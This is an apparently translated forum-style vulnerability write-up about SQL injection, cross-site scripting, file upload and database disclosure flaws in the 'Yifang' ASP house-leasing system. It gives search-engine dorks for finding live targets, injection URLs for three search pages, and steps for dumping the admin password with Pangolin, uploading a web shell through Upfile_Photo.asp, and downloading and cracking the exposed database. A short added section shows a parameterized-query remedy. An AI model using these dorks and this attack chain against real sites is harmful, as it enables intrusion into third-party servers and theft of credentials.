Search injection vulnerability in Yifang System

Source: Internet
Author: User

Keyword: inurl:efwmanager; inurl:search_hire.asp; (inurl:sub_hack.asp returns too many results for this keyword)

Affected Version: Unknown

Vulnerable files: search_sell.asp; search_hire.asp; search_buy.asp; conn.asp

Description: This is a house transaction and leasing system.

The site is offline, so let's look at the source code instead. Searching the files in Macromedia Dreamweaver for request( shows that nothing is strictly filtered. Integer overflow issues exist but are of no use. The search_hire.asp file took a while to find. The code is as follows:

<!--#include file="efwmanager/include/config.asp" -->
<!--#include file="conn_view.asp" -->
<!--#include file="efwmanager/include/function.asp" -->
<%
Dim search, search_qy, search_lx, search_hx, search_zj, search_mj_min, search_mj_max, search_jg_min, search_jg_max
' Every value is read straight from the request; nothing is validated or escaped.
search_qy = request("search_qy")
search_lx = request("search_lx")
search_hx = request("search_hx")
search_zj = request("search_zj")
search_mj_min = trim(request("search_mj_min"))
search_mj_max = trim(request("search_mj_max"))
search_jg_min = trim(request("search_jg_min"))
search_jg_max = trim(request("search_jg_max"))

' The WHERE clause is built by string concatenation, so any non-empty
' request value is pasted verbatim into the SQL text.
search = ""
If request("search_qy") <> "" then
    search = search & " and qy=" & request("search_qy") & ""
End if
If request("search_lx") <> "" then
    search = search & " and wylx=" & request("search_lx") & ""
End if
If request("search_hx") <> "" then
    search = search & " and hx=" & request("search_hx") & ""
End if
If request("search_zj") <> "" then
    search = search & " and zj=" & request("search_zj") & ""
End if

This is a search file. The header file contains no anti-injection code, which I will not explain further. The vulnerability is obvious: no characters are filtered at all, which results in both cross-site scripting and injection. What we need is an account and a password. Next we build the injection address: http://sniff3r/search_hire.asp?pageno=1&search_lx=&search_hx=&search_zj=&search_mj_min=&search_mj_max=&search_jg_min=&search_jg_max=&search_qy= (the injection statement after search_qy= is left empty). You can run it directly in Pangolin 3.0. The admin table has a username field, and the administrator's password is shown in the userpassword field. The back end is efang/efwmanager/index.asp. Getting a shell from the back end is very simple: because of a file upload vulnerability, you can directly access efwmanager/admin/Upfile_Photo.asp and upload with the "startup boy" tool. This program has another vulnerable file, the conn.asp connection file (there are two conn.asp files in this program). Both connection files have a "storm library" (database path disclosure) problem, since the asp code uses on error resume next. Either change the / in front of the second-level directory to %5C, or directly access the exposed database and paste the link into Thunder to download it. The downloaded database contains the password, and the encryption method is simple; tools such as accesskey can crack it.
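As an added example (not code from the original program), here is how the same search filters could be built with ADODB.Command bound parameters so that request values never become part of the SQL text; the table name tbl_hire and the open connection object conn are assumptions.

```asp
<%
' Added example, not from the original program: the same search filters
' built with ADODB.Command parameters instead of string concatenation.
' Assumptions (hypothetical): conn is an open ADODB.Connection created by
' conn_view.asp, and the listings live in a table named tbl_hire.
Const adCmdText = 1, adVarChar = 200, adParamInput = 1

Dim cmd, rs, sqlText
sqlText = "SELECT * FROM tbl_hire WHERE 1=1"
Set cmd = Server.CreateObject("ADODB.Command")
cmd.ActiveConnection = conn
cmd.CommandType = adCmdText

' Appends "AND <column> = ?" for a non-empty request value. The column
' name is a literal chosen by the script, never taken from the request;
' the value travels as a bound parameter, so quotes and comment
' sequences inside it cannot change the statement.
Sub AddTextFilter(columnName, paramName)
    Dim v
    v = Trim(Request(paramName))
    If v <> "" Then
        sqlText = sqlText & " AND " & columnName & " = ?"
        cmd.Parameters.Append cmd.CreateParameter(paramName, adVarChar, adParamInput, 255, v)
    End If
End Sub

AddTextFilter "qy", "search_qy"
AddTextFilter "wylx", "search_lx"
AddTextFilter "hx", "search_hx"
AddTextFilter "zj", "search_zj"

cmd.CommandText = sqlText
Set rs = cmd.Execute

' Output encoding closes the cross-site scripting half of the problem:
' values echoed back to the page go through Server.HTMLEncode
' (the & "" guards against Null fields, which HTMLEncode rejects).
Do Until rs.EOF
    Response.Write "<li>" & Server.HTMLEncode(rs("qy") & "") & "</li>" & vbCrLf
    rs.MoveNext
Loop
rs.Close
%>
```

Parameters are bound in the same order as the ? placeholders, which matters for Access and other OLE DB providers that match parameters by position.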
No other vulnerabilities have been discovered yet. Please point out anything that is wrong. In addition, here are the exploitation strings for the other two files.
search_sell.asp vulnerability string:
http://sniff3r/search_sell.asp?pageno=1&search_lx=&search_hx=&search_zj=&search_mj_min=&search_mj_max=&search_jg_min=&search_jg_max=&search_qy=
search_buy.asp vulnerability string:
http://sniff3r/search_buy.asp?pageno=1&search_qy=&search_hx=&search_zj=&search_mj_min=&search_mj_max=&search_jg_min=&search_jg_max=&search_lx=

For more information, see system/manage.asp, system/index.asp and efwmanager/index.asp.

sub_hack.asp: this keyword belongs to a similar system found on the Internet. The file is not strictly filtered and has the same vulnerability, so I will not go into detail. It can almost always be used. You can use Pangolin or mingxiao (4.2).
